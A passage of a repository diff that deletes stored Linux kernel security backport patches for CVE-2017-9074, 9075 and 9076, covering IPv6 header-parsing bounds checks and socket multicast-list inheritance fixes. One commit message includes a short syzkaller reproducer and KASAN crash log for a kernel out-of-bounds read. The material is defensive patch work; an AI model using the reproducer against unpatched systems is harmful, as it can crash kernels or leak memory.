-[   42.373681]  ? ip6_copy_metadata+0x7f0/0x7f0
-[   42.374263]  ? ip6_forward+0x2e30/0x2e30
-[   42.374803]  ip6_finish_output+0x584/0x990
-[   42.375350]  ip6_output+0x1b7/0x690
-[   42.375836]  ? ip6_finish_output+0x990/0x990
-[   42.376411]  ? ip6_fragment+0x3730/0x3730
-[   42.376968]  ip6_local_out+0x95/0x160
-[   42.377471]  ip6_send_skb+0xa1/0x330
-[   42.377969]  ip6_push_pending_frames+0xb3/0xe0
-[   42.378589]  rawv6_sendmsg+0x2051/0x2db0
-[   42.379129]  ? rawv6_bind+0x8b0/0x8b0
-[   42.379633]  ? _copy_from_user+0x84/0xe0
-[   42.380193]  ? debug_check_no_locks_freed+0x290/0x290
-[   42.380878]  ? ___sys_sendmsg+0x162/0x930
-[   42.381427]  ? rcu_read_lock_sched_held+0xa3/0x120
-[   42.382074]  ? sock_has_perm+0x1f6/0x290
-[   42.382614]  ? ___sys_sendmsg+0x167/0x930
-[   42.383173]  ? lock_downgrade+0x660/0x660
-[   42.383727]  inet_sendmsg+0x123/0x500
-[   42.384226]  ? inet_sendmsg+0x123/0x500
-[   42.384748]  ? inet_recvmsg+0x540/0x540
-[   42.385263]  sock_sendmsg+0xca/0x110
-[   42.385758]  SYSC_sendto+0x217/0x380
-[   42.386249]  ? SYSC_connect+0x310/0x310
-[   42.386783]  ? __might_fault+0x110/0x1d0
-[   42.387324]  ? lock_downgrade+0x660/0x660
-[   42.387880]  ? __fget_light+0xa1/0x1f0
-[   42.388403]  ? __fdget+0x18/0x20
-[   42.388851]  ? sock_common_setsockopt+0x95/0xd0
-[   42.389472]  ? SyS_setsockopt+0x17f/0x260
-[   42.390021]  ? entry_SYSCALL_64_fastpath+0x5/0xbe
-[   42.390650]  SyS_sendto+0x40/0x50
-[   42.391103]  entry_SYSCALL_64_fastpath+0x1f/0xbe
-[   42.391731] RIP: 0033:0x7fbbb711e383
-[   42.392217] RSP: 002b:00007ffff4d34f28 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
-[   42.393235] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fbbb711e383
-[   42.394195] RDX: 0000000000001000 RSI: 00007ffff4d34f60 RDI: 0000000000000003
-[   42.395145] RBP: 0000000000000046 R08: 00007ffff4d34f40 R09: 0000000000000018
-[   42.396056] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000400aad
-[   42.396598] R13: 0000000000000066 R14: 00007ffff4d34ee0 R15: 00007fbbb717af00
-[   42.397257]
-[   42.397411] Allocated by task 3789:
-[   42.397702]  save_stack_trace+0x16/0x20
-[   42.398005]  save_stack+0x46/0xd0
-[   42.398267]  kasan_kmalloc+0xad/0xe0
-[   42.398548]  kasan_slab_alloc+0x12/0x20
-[   42.398848]  __kmalloc_node_track_caller+0xcb/0x380
-[   42.399224]  __kmalloc_reserve.isra.32+0x41/0xe0
-[   42.399654]  __alloc_skb+0xf8/0x580
-[   42.400003]  sock_wmalloc+0xab/0xf0
-[   42.400346]  __ip6_append_data.isra.41+0x2472/0x33d0
-[   42.400813]  ip6_append_data+0x1a8/0x2f0
-[   42.401122]  rawv6_sendmsg+0x11ee/0x2db0
-[   42.401505]  inet_sendmsg+0x123/0x500
-[   42.401860]  sock_sendmsg+0xca/0x110
-[   42.402209]  ___sys_sendmsg+0x7cb/0x930
-[   42.402582]  __sys_sendmsg+0xd9/0x190
-[   42.402941]  SyS_sendmsg+0x2d/0x50
-[   42.403273]  entry_SYSCALL_64_fastpath+0x1f/0xbe
-[   42.403718]
-[   42.403871] Freed by task 1794:
-[   42.404146]  save_stack_trace+0x16/0x20
-[   42.404515]  save_stack+0x46/0xd0
-[   42.404827]  kasan_slab_free+0x72/0xc0
-[   42.405167]  kfree+0xe8/0x2b0
-[   42.405462]  skb_free_head+0x74/0xb0
-[   42.405806]  skb_release_data+0x30e/0x3a0
-[   42.406198]  skb_release_all+0x4a/0x60
-[   42.406563]  consume_skb+0x113/0x2e0
-[   42.406910]  skb_free_datagram+0x1a/0xe0
-[   42.407288]  netlink_recvmsg+0x60d/0xe40
-[   42.407667]  sock_recvmsg+0xd7/0x110
-[   42.408022]  ___sys_recvmsg+0x25c/0x580
-[   42.408395]  __sys_recvmsg+0xd6/0x190
-[   42.408753]  SyS_recvmsg+0x2d/0x50
-[   42.409086]  entry_SYSCALL_64_fastpath+0x1f/0xbe
-[   42.409513]
-[   42.409665] The buggy address belongs to the object at ffff88000969e780
-[   42.409665]  which belongs to the cache kmalloc-512 of size 512
-[   42.410846] The buggy address is located 24 bytes inside of
-[   42.410846]  512-byte region [ffff88000969e780, ffff88000969e980)
-[   42.411941] The buggy address belongs to the page:
-[   42.412405] page:ffffea000025a780 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0
-[   42.413298] flags: 0x100000000008100(slab|head)
-[   42.413729] raw: 0100000000008100 0000000000000000 0000000000000000 00000001800c000c
-[   42.414387] raw: ffffea00002a9500 0000000900000007 ffff88000c401280 0000000000000000
-[   42.415074] page dumped because: kasan: bad access detected
-[   42.415604]
-[   42.415757] Memory state around the buggy address:
-[   42.416222]  ffff88000969e880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-[   42.416904]  ffff88000969e900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-[   42.417591] >ffff88000969e980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-[   42.418273]                    ^
-[   42.418588]  ffff88000969ea00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-[   42.419273]  ffff88000969ea80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-[   42.419882] ==================================================================
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Craig Gallek <kraig@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-[bwh: Backported to 3.2: adjust filenames, context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- net/ipv6/af_inet6.c   |  2 ++
- net/ipv6/ip6_output.c | 18 ++++++++++++------
- net/ipv6/udp.c        |  2 ++
- 3 files changed, 16 insertions(+), 6 deletions(-)
-
-diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
-index 8657823..914c7d5 100644
---- a/net/ipv6/af_inet6.c
-+++ b/net/ipv6/af_inet6.c
-@@ -825,6 +825,8 @@ static struct sk_buff *ipv6_gso_segment(struct sk_buff *skb, u32 features)
- 					   sizeof(*ipv6h));
- 		if (proto == IPPROTO_UDP) {
- 			unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr);
-+			if (unfrag_ip6hlen < 0)
-+				return ERR_PTR(unfrag_ip6hlen);
- 			fptr = (struct frag_hdr *)(skb_network_header(skb) +
- 				unfrag_ip6hlen);
- 			fptr->frag_off = htons(offset);
-diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
-index c59f646..dd31060 100644
---- a/net/ipv6/ip6_output.c
-+++ b/net/ipv6/ip6_output.c
-@@ -562,13 +562,12 @@ static void ip6_copy_metadata(struct sk_buff *to, struct sk_buff *from)
- int ip6_find_1stfragopt(struct sk_buff *skb, u8 **nexthdr)
- {
- 	u16 offset = sizeof(struct ipv6hdr);
--	struct ipv6_opt_hdr *exthdr =
--				(struct ipv6_opt_hdr *)(ipv6_hdr(skb) + 1);
- 	unsigned int packet_len = skb->tail - skb->network_header;
- 	int found_rhdr = 0;
- 	*nexthdr = &ipv6_hdr(skb)->nexthdr;
- 
--	while (offset + 1 <= packet_len) {
-+	while (offset <= packet_len) {
-+		struct ipv6_opt_hdr *exthdr;
- 
- 		switch (**nexthdr) {
- 
-@@ -589,13 +588,16 @@ int ip6_find_1stfragopt(struct sk_buff *skb, u8 **nexthdr)
- 			return offset;
- 		}
- 
--		offset += ipv6_optlen(exthdr);
--		*nexthdr = &exthdr->nexthdr;
-+		if (offset + sizeof(struct ipv6_opt_hdr) > packet_len)
-+			return -EINVAL;
-+
- 		exthdr = (struct ipv6_opt_hdr *)(skb_network_header(skb) +
- 						 offset);
-+		offset += ipv6_optlen(exthdr);
-+		*nexthdr = &exthdr->nexthdr;
- 	}
- 
--	return offset;
-+	return -EINVAL;
- }
- 
- void ipv6_select_ident(struct frag_hdr *fhdr, struct rt6_info *rt)
-@@ -630,6 +632,10 @@ int ip6_fragment(struct sk_buff *skb, int (*output)(struct sk_buff *))
- 	struct net *net = dev_net(skb_dst(skb)->dev);
- 
- 	hlen = ip6_find_1stfragopt(skb, &prevhdr);
-+	if (hlen < 0) {
-+		err = hlen;
-+		goto fail;
-+	}
- 	nexthdr = *prevhdr;
- 
- 	mtu = ip6_skb_dst_mtu(skb);
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index 03a7ed1..8157ae0 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -1353,6 +1353,8 @@ static struct sk_buff *udp6_ufo_fragment(struct sk_buff *skb, u32 features)
- 	 * bytes to insert fragment header.
- 	 */
- 	unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr);
-+	if (unfrag_ip6hlen < 0)
-+		return ERR_PTR(unfrag_ip6hlen);
- 	nexthdr = *prevhdr;
- 	*prevhdr = NEXTHDR_FRAGMENT;
- 	unfrag_len = skb_network_header(skb) - skb_mac_header(skb) +
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9074/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2017-9074/3.2/0002.patch
deleted file mode 100644
index 7a5f14cb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9074/3.2/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From f7c2d2d7ebf9a110cafbe53199457c318f61a192 Mon Sep 17 00:00:00 2001
-From: "David S. Miller" <davem@davemloft.net>
-Date: Wed, 17 May 2017 22:54:11 -0400
-Subject: ipv6: Check ip6_find_1stfragopt() return value properly.
-
-commit 7dd7eb9513bd02184d45f000ab69d78cb1fa1531 upstream.
-
-Do not use unsigned variables to see if it returns a negative
-error or not.
-
-Fixes: 2423496af35d ("ipv6: Prevent overrun when parsing v6 header options")
-Reported-by: Julia Lawall <julia.lawall@lip6.fr>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-[bwh: Backported to 3.2: adjust filenames, context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- net/ipv6/af_inet6.c   | 9 ++++-----
- net/ipv6/ip6_output.c | 7 +++----
- net/ipv6/udp.c        | 8 +++++---
- 3 files changed, 12 insertions(+), 12 deletions(-)
-
-diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
-index 914c7d5..b0e4fb8 100644
---- a/net/ipv6/af_inet6.c
-+++ b/net/ipv6/af_inet6.c
-@@ -785,7 +785,6 @@ static struct sk_buff *ipv6_gso_segment(struct sk_buff *skb, u32 features)
- 	const struct inet6_protocol *ops;
- 	int proto;
- 	struct frag_hdr *fptr;
--	unsigned int unfrag_ip6hlen;
- 	u8 *prevhdr;
- 	int offset = 0;
- 
-@@ -824,11 +823,11 @@ static struct sk_buff *ipv6_gso_segment(struct sk_buff *skb, u32 features)
- 		ipv6h->payload_len = htons(skb->len - skb->mac_len -
- 					   sizeof(*ipv6h));
- 		if (proto == IPPROTO_UDP) {
--			unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr);
--			if (unfrag_ip6hlen < 0)
--				return ERR_PTR(unfrag_ip6hlen);
-+			int err = ip6_find_1stfragopt(skb, &prevhdr);
-+			if (err < 0)
-+				return ERR_PTR(err);
- 			fptr = (struct frag_hdr *)(skb_network_header(skb) +
--				unfrag_ip6hlen);
-+				err);
- 			fptr->frag_off = htons(offset);
- 			if (skb->next != NULL)
- 				fptr->frag_off |= htons(IP6_MF);
-diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
-index dd31060..81a7803 100644
---- a/net/ipv6/ip6_output.c
-+++ b/net/ipv6/ip6_output.c
-@@ -631,11 +631,10 @@ int ip6_fragment(struct sk_buff *skb, int (*output)(struct sk_buff *))
- 	u8 *prevhdr, nexthdr = 0;
- 	struct net *net = dev_net(skb_dst(skb)->dev);
- 
--	hlen = ip6_find_1stfragopt(skb, &prevhdr);
--	if (hlen < 0) {
--		err = hlen;
-+	err = ip6_find_1stfragopt(skb, &prevhdr);
-+	if (err < 0)
- 		goto fail;
--	}
-+	hlen = err;
- 	nexthdr = *prevhdr;
- 
- 	mtu = ip6_skb_dst_mtu(skb);
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index 8157ae0..5f0d519 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -1316,6 +1316,7 @@ static struct sk_buff *udp6_ufo_fragment(struct sk_buff *skb, u32 features)
- 	u8 frag_hdr_sz = sizeof(struct frag_hdr);
- 	int offset;
- 	__wsum csum;
-+	int err;
- 
- 	mss = skb_shinfo(skb)->gso_size;
- 	if (unlikely(skb->len <= mss))
-@@ -1352,9 +1353,10 @@ static struct sk_buff *udp6_ufo_fragment(struct sk_buff *skb, u32 features)
- 	/* Find the unfragmentable header and shift it left by frag_hdr_sz
- 	 * bytes to insert fragment header.
- 	 */
--	unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr);
--	if (unfrag_ip6hlen < 0)
--		return ERR_PTR(unfrag_ip6hlen);
-+	err = ip6_find_1stfragopt(skb, &prevhdr);
-+	if (err < 0)
-+		return ERR_PTR(err);
-+	unfrag_ip6hlen = err;
- 	nexthdr = *prevhdr;
- 	*prevhdr = NEXTHDR_FRAGMENT;
- 	unfrag_len = skb_network_header(skb) - skb_mac_header(skb) +
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9074/^4.11/0003.patch b/Patches/Linux_CVEs/CVE-2017-9074/^4.11/0003.patch
deleted file mode 100644
index b4c2bb80..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9074/^4.11/0003.patch
+++ /dev/null
@@ -1,231 +0,0 @@
-From 2423496af35d94a87156b063ea5cedffc10a70a1 Mon Sep 17 00:00:00 2001
-From: Craig Gallek <kraig@google.com>
-Date: Tue, 16 May 2017 14:36:23 -0400
-Subject: ipv6: Prevent overrun when parsing v6 header options
-
-The KASAN warning repoted below was discovered with a syzkaller
-program.  The reproducer is basically:
-  int s = socket(AF_INET6, SOCK_RAW, NEXTHDR_HOP);
-  send(s, &one_byte_of_data, 1, MSG_MORE);
-  send(s, &more_than_mtu_bytes_data, 2000, 0);
-
-The socket() call sets the nexthdr field of the v6 header to
-NEXTHDR_HOP, the first send call primes the payload with a non zero
-byte of data, and the second send call triggers the fragmentation path.
-
-The fragmentation code tries to parse the header options in order
-to figure out where to insert the fragment option.  Since nexthdr points
-to an invalid option, the calculation of the size of the network header
-can made to be much larger than the linear section of the skb and data
-is read outside of it.
-
-This fix makes ip6_find_1stfrag return an error if it detects
-running out-of-bounds.
-
-[   42.361487] ==================================================================
-[   42.364412] BUG: KASAN: slab-out-of-bounds in ip6_fragment+0x11c8/0x3730
-[   42.365471] Read of size 840 at addr ffff88000969e798 by task ip6_fragment-oo/3789
-[   42.366469]
-[   42.366696] CPU: 1 PID: 3789 Comm: ip6_fragment-oo Not tainted 4.11.0+ #41
-[   42.367628] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014
-[   42.368824] Call Trace:
-[   42.369183]  dump_stack+0xb3/0x10b
-[   42.369664]  print_address_description+0x73/0x290
-[   42.370325]  kasan_report+0x252/0x370
-[   42.370839]  ? ip6_fragment+0x11c8/0x3730
-[   42.371396]  check_memory_region+0x13c/0x1a0
-[   42.371978]  memcpy+0x23/0x50
-[   42.372395]  ip6_fragment+0x11c8/0x3730
-[   42.372920]  ? nf_ct_expect_unregister_notifier+0x110/0x110
-[   42.373681]  ? ip6_copy_metadata+0x7f0/0x7f0
-[   42.374263]  ? ip6_forward+0x2e30/0x2e30
-[   42.374803]  ip6_finish_output+0x584/0x990
-[   42.375350]  ip6_output+0x1b7/0x690
-[   42.375836]  ? ip6_finish_output+0x990/0x990
-[   42.376411]  ? ip6_fragment+0x3730/0x3730
-[   42.376968]  ip6_local_out+0x95/0x160
-[   42.377471]  ip6_send_skb+0xa1/0x330
-[   42.377969]  ip6_push_pending_frames+0xb3/0xe0
-[   42.378589]  rawv6_sendmsg+0x2051/0x2db0
-[   42.379129]  ? rawv6_bind+0x8b0/0x8b0
-[   42.379633]  ? _copy_from_user+0x84/0xe0
-[   42.380193]  ? debug_check_no_locks_freed+0x290/0x290
-[   42.380878]  ? ___sys_sendmsg+0x162/0x930
-[   42.381427]  ? rcu_read_lock_sched_held+0xa3/0x120
-[   42.382074]  ? sock_has_perm+0x1f6/0x290
-[   42.382614]  ? ___sys_sendmsg+0x167/0x930
-[   42.383173]  ? lock_downgrade+0x660/0x660
-[   42.383727]  inet_sendmsg+0x123/0x500
-[   42.384226]  ? inet_sendmsg+0x123/0x500
-[   42.384748]  ? inet_recvmsg+0x540/0x540
-[   42.385263]  sock_sendmsg+0xca/0x110
-[   42.385758]  SYSC_sendto+0x217/0x380
-[   42.386249]  ? SYSC_connect+0x310/0x310
-[   42.386783]  ? __might_fault+0x110/0x1d0
-[   42.387324]  ? lock_downgrade+0x660/0x660
-[   42.387880]  ? __fget_light+0xa1/0x1f0
-[   42.388403]  ? __fdget+0x18/0x20
-[   42.388851]  ? sock_common_setsockopt+0x95/0xd0
-[   42.389472]  ? SyS_setsockopt+0x17f/0x260
-[   42.390021]  ? entry_SYSCALL_64_fastpath+0x5/0xbe
-[   42.390650]  SyS_sendto+0x40/0x50
-[   42.391103]  entry_SYSCALL_64_fastpath+0x1f/0xbe
-[   42.391731] RIP: 0033:0x7fbbb711e383
-[   42.392217] RSP: 002b:00007ffff4d34f28 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
-[   42.393235] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fbbb711e383
-[   42.394195] RDX: 0000000000001000 RSI: 00007ffff4d34f60 RDI: 0000000000000003
-[   42.395145] RBP: 0000000000000046 R08: 00007ffff4d34f40 R09: 0000000000000018
-[   42.396056] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000400aad
-[   42.396598] R13: 0000000000000066 R14: 00007ffff4d34ee0 R15: 00007fbbb717af00
-[   42.397257]
-[   42.397411] Allocated by task 3789:
-[   42.397702]  save_stack_trace+0x16/0x20
-[   42.398005]  save_stack+0x46/0xd0
-[   42.398267]  kasan_kmalloc+0xad/0xe0
-[   42.398548]  kasan_slab_alloc+0x12/0x20
-[   42.398848]  __kmalloc_node_track_caller+0xcb/0x380
-[   42.399224]  __kmalloc_reserve.isra.32+0x41/0xe0
-[   42.399654]  __alloc_skb+0xf8/0x580
-[   42.400003]  sock_wmalloc+0xab/0xf0
-[   42.400346]  __ip6_append_data.isra.41+0x2472/0x33d0
-[   42.400813]  ip6_append_data+0x1a8/0x2f0
-[   42.401122]  rawv6_sendmsg+0x11ee/0x2db0
-[   42.401505]  inet_sendmsg+0x123/0x500
-[   42.401860]  sock_sendmsg+0xca/0x110
-[   42.402209]  ___sys_sendmsg+0x7cb/0x930
-[   42.402582]  __sys_sendmsg+0xd9/0x190
-[   42.402941]  SyS_sendmsg+0x2d/0x50
-[   42.403273]  entry_SYSCALL_64_fastpath+0x1f/0xbe
-[   42.403718]
-[   42.403871] Freed by task 1794:
-[   42.404146]  save_stack_trace+0x16/0x20
-[   42.404515]  save_stack+0x46/0xd0
-[   42.404827]  kasan_slab_free+0x72/0xc0
-[   42.405167]  kfree+0xe8/0x2b0
-[   42.405462]  skb_free_head+0x74/0xb0
-[   42.405806]  skb_release_data+0x30e/0x3a0
-[   42.406198]  skb_release_all+0x4a/0x60
-[   42.406563]  consume_skb+0x113/0x2e0
-[   42.406910]  skb_free_datagram+0x1a/0xe0
-[   42.407288]  netlink_recvmsg+0x60d/0xe40
-[   42.407667]  sock_recvmsg+0xd7/0x110
-[   42.408022]  ___sys_recvmsg+0x25c/0x580
-[   42.408395]  __sys_recvmsg+0xd6/0x190
-[   42.408753]  SyS_recvmsg+0x2d/0x50
-[   42.409086]  entry_SYSCALL_64_fastpath+0x1f/0xbe
-[   42.409513]
-[   42.409665] The buggy address belongs to the object at ffff88000969e780
-[   42.409665]  which belongs to the cache kmalloc-512 of size 512
-[   42.410846] The buggy address is located 24 bytes inside of
-[   42.410846]  512-byte region [ffff88000969e780, ffff88000969e980)
-[   42.411941] The buggy address belongs to the page:
-[   42.412405] page:ffffea000025a780 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0
-[   42.413298] flags: 0x100000000008100(slab|head)
-[   42.413729] raw: 0100000000008100 0000000000000000 0000000000000000 00000001800c000c
-[   42.414387] raw: ffffea00002a9500 0000000900000007 ffff88000c401280 0000000000000000
-[   42.415074] page dumped because: kasan: bad access detected
-[   42.415604]
-[   42.415757] Memory state around the buggy address:
-[   42.416222]  ffff88000969e880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-[   42.416904]  ffff88000969e900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-[   42.417591] >ffff88000969e980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-[   42.418273]                    ^
-[   42.418588]  ffff88000969ea00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-[   42.419273]  ffff88000969ea80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-[   42.419882] ==================================================================
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Craig Gallek <kraig@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/ipv6/ip6_offload.c |  2 ++
- net/ipv6/ip6_output.c  |  4 ++++
- net/ipv6/output_core.c | 14 ++++++++------
- net/ipv6/udp_offload.c |  2 ++
- 4 files changed, 16 insertions(+), 6 deletions(-)
-
-diff --git a/net/ipv6/ip6_offload.c b/net/ipv6/ip6_offload.c
-index 93e58a5..eab36ab 100644
---- a/net/ipv6/ip6_offload.c
-+++ b/net/ipv6/ip6_offload.c
-@@ -117,6 +117,8 @@ static struct sk_buff *ipv6_gso_segment(struct sk_buff *skb,
- 
- 		if (udpfrag) {
- 			unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr);
-+			if (unfrag_ip6hlen < 0)
-+				return ERR_PTR(unfrag_ip6hlen);
- 			fptr = (struct frag_hdr *)((u8 *)ipv6h + unfrag_ip6hlen);
- 			fptr->frag_off = htons(offset);
- 			if (skb->next)
-diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
-index 58f6288..01deecd 100644
---- a/net/ipv6/ip6_output.c
-+++ b/net/ipv6/ip6_output.c
-@@ -598,6 +598,10 @@ int ip6_fragment(struct net *net, struct sock *sk, struct sk_buff *skb,
- 	u8 *prevhdr, nexthdr = 0;
- 
- 	hlen = ip6_find_1stfragopt(skb, &prevhdr);
-+	if (hlen < 0) {
-+		err = hlen;
-+		goto fail;
-+	}
- 	nexthdr = *prevhdr;
- 
- 	mtu = ip6_skb_dst_mtu(skb);
-diff --git a/net/ipv6/output_core.c b/net/ipv6/output_core.c
-index cd42523..e9065b8 100644
---- a/net/ipv6/output_core.c
-+++ b/net/ipv6/output_core.c
-@@ -79,14 +79,13 @@ EXPORT_SYMBOL(ipv6_select_ident);
- int ip6_find_1stfragopt(struct sk_buff *skb, u8 **nexthdr)
- {
- 	u16 offset = sizeof(struct ipv6hdr);
--	struct ipv6_opt_hdr *exthdr =
--				(struct ipv6_opt_hdr *)(ipv6_hdr(skb) + 1);
- 	unsigned int packet_len = skb_tail_pointer(skb) -
- 		skb_network_header(skb);
- 	int found_rhdr = 0;
- 	*nexthdr = &ipv6_hdr(skb)->nexthdr;
- 
--	while (offset + 1 <= packet_len) {
-+	while (offset <= packet_len) {
-+		struct ipv6_opt_hdr *exthdr;
- 
- 		switch (**nexthdr) {
- 
-@@ -107,13 +106,16 @@ int ip6_find_1stfragopt(struct sk_buff *skb, u8 **nexthdr)
- 			return offset;
- 		}
- 
--		offset += ipv6_optlen(exthdr);
--		*nexthdr = &exthdr->nexthdr;
-+		if (offset + sizeof(struct ipv6_opt_hdr) > packet_len)
-+			return -EINVAL;
-+
- 		exthdr = (struct ipv6_opt_hdr *)(skb_network_header(skb) +
- 						 offset);
-+		offset += ipv6_optlen(exthdr);
-+		*nexthdr = &exthdr->nexthdr;
- 	}
- 
--	return offset;
-+	return -EINVAL;
- }
- EXPORT_SYMBOL(ip6_find_1stfragopt);
- 
-diff --git a/net/ipv6/udp_offload.c b/net/ipv6/udp_offload.c
-index ac858c4..b348cff 100644
---- a/net/ipv6/udp_offload.c
-+++ b/net/ipv6/udp_offload.c
-@@ -91,6 +91,8 @@ static struct sk_buff *udp6_ufo_fragment(struct sk_buff *skb,
- 		 * bytes to insert fragment header.
- 		 */
- 		unfrag_ip6hlen = ip6_find_1stfragopt(skb, &prevhdr);
-+		if (unfrag_ip6hlen < 0)
-+			return ERR_PTR(unfrag_ip6hlen);
- 		nexthdr = *prevhdr;
- 		*prevhdr = NEXTHDR_FRAGMENT;
- 		unfrag_len = (skb_network_header(skb) - skb_mac_header(skb)) +
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9075/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9075/^4.11/0001.patch
deleted file mode 100644
index 238ab02f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9075/^4.11/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From fdcee2cbb8438702ea1b328fb6e0ac5e9a40c7f8 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Wed, 17 May 2017 07:16:40 -0700
-Subject: sctp: do not inherit ipv6_{mc|ac|fl}_list from parent
-
-SCTP needs fixes similar to 83eaddab4378 ("ipv6/dccp: do not inherit
-ipv6_mc_list from parent"), otherwise bad things can happen.
-
-Signed-off-by: Eric Dumazet <edumazet@google.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/sctp/ipv6.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/net/sctp/ipv6.c b/net/sctp/ipv6.c
-index 142b70e..f5b45b8 100644
---- a/net/sctp/ipv6.c
-+++ b/net/sctp/ipv6.c
-@@ -677,6 +677,9 @@ static struct sock *sctp_v6_create_accept_sk(struct sock *sk,
- 	newnp = inet6_sk(newsk);
- 
- 	memcpy(newnp, np, sizeof(struct ipv6_pinfo));
-+	newnp->ipv6_mc_list = NULL;
-+	newnp->ipv6_ac_list = NULL;
-+	newnp->ipv6_fl_list = NULL;
- 
- 	rcu_read_lock();
- 	opt = rcu_dereference(np->opt);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9076/^4.11/0001.patch b/Patches/Linux_CVEs/CVE-2017-9076/^4.11/0001.patch
deleted file mode 100644
index 828a8905..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9076/^4.11/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From 83eaddab4378db256d00d295bda6ca997cd13a52 Mon Sep 17 00:00:00 2001
-From: WANG Cong <xiyou.wangcong@gmail.com>
-Date: Tue, 9 May 2017 16:59:54 -0700
-Subject: ipv6/dccp: do not inherit ipv6_mc_list from parent
-
-Like commit 657831ffc38e ("dccp/tcp: do not inherit mc_list from parent")
-we should clear ipv6_mc_list etc. for IPv6 sockets too.
-
-Cc: Eric Dumazet <edumazet@google.com>
-Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
-Acked-by: Eric Dumazet <edumazet@google.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/dccp/ipv6.c     | 6 ++++++
- net/ipv6/tcp_ipv6.c | 2 ++
- 2 files changed, 8 insertions(+)
-
-diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
-index d9b6a4e..b6bbb71 100644
---- a/net/dccp/ipv6.c
-+++ b/net/dccp/ipv6.c
-@@ -426,6 +426,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- 		newsk->sk_backlog_rcv = dccp_v4_do_rcv;
- 		newnp->pktoptions  = NULL;
- 		newnp->opt	   = NULL;
-+		newnp->ipv6_mc_list = NULL;
-+		newnp->ipv6_ac_list = NULL;
-+		newnp->ipv6_fl_list = NULL;
- 		newnp->mcast_oif   = inet6_iif(skb);
- 		newnp->mcast_hops  = ipv6_hdr(skb)->hop_limit;
- 
-@@ -490,6 +493,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
- 	/* Clone RX bits */
- 	newnp->rxopt.all = np->rxopt.all;
- 
-+	newnp->ipv6_mc_list = NULL;
-+	newnp->ipv6_ac_list = NULL;
-+	newnp->ipv6_fl_list = NULL;
- 	newnp->pktoptions = NULL;
- 	newnp->opt	  = NULL;
- 	newnp->mcast_oif  = inet6_iif(skb);
-diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
-index aeb9497..df5a9ff 100644
---- a/net/ipv6/tcp_ipv6.c
-+++ b/net/ipv6/tcp_ipv6.c
-@@ -1062,6 +1062,7 @@ static struct sock *tcp_v6_syn_recv_sock(const struct sock *sk, struct sk_buff *
- 		newtp->af_specific = &tcp_sock_ipv6_mapped_specific;
- #endif
- 
-+		newnp->ipv6_mc_list = NULL;
- 		newnp->ipv6_ac_list = NULL;
- 		newnp->ipv6_fl_list = NULL;
- 		newnp->pktoptions  = NULL;
